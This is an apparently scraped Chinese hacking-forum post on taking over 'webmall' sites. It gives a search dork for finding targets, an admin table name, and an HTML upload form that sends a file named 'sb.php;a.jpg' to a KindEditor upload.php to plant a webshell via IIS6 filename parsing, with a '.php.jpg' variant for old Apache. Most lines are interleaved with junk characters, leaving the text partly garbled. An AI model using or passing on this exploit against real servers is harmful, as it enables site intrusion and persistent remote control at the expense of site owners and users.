关键字:inurl:webmall/detail.php?id
% J8 W8 D% w7 o" P6 Z# B# [$ [# m9 }: s( I7 d' C4 g
数据表:pwn_base_admin( l# F4 W% Z) a/ e
# M% i! j3 D" t) f( \9 B
关于拿shell
' B. j- y; U* H5 y 5 l( I' k7 B1 Q6 G. O0 h0 Z( e. [# V
首先登录后台admin.php
) p+ P+ E8 u, i& B3 q3 o
- E! g1 U' |; \0 Q1 J, l$ _2 L. y看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
v1 A8 C% _+ z9 r6 B4 {+ I" p+ e换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
4 ~1 c1 s# u& n! D, R% R然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
: @8 o6 \9 Q& m! W! @! j% S<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
2 e$ p2 f! S6 }0 |<input type="text" name="fileName" value="sb.php;a.jpg" /> % }& T. w( S) Z
<input type="hidden" name="attachPath" value="news/pics/" /> 7 Z! A' n! X0 W, V; e
<input type="file" name="fileData" size="14" /></td>
- J) O9 e# G/ d. K# A& ?4 A" H<input type="submit" name="button" value="确定" />
" Z! h1 Y I8 R' w( a</form>) `( M/ ^0 u4 i. ]" s5 v
3 Z9 W( n: {9 Y! Y7 x) p
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
$ A" l: d3 \; n ~2 b& l* [! I1 J& O# K* S G# y: l
|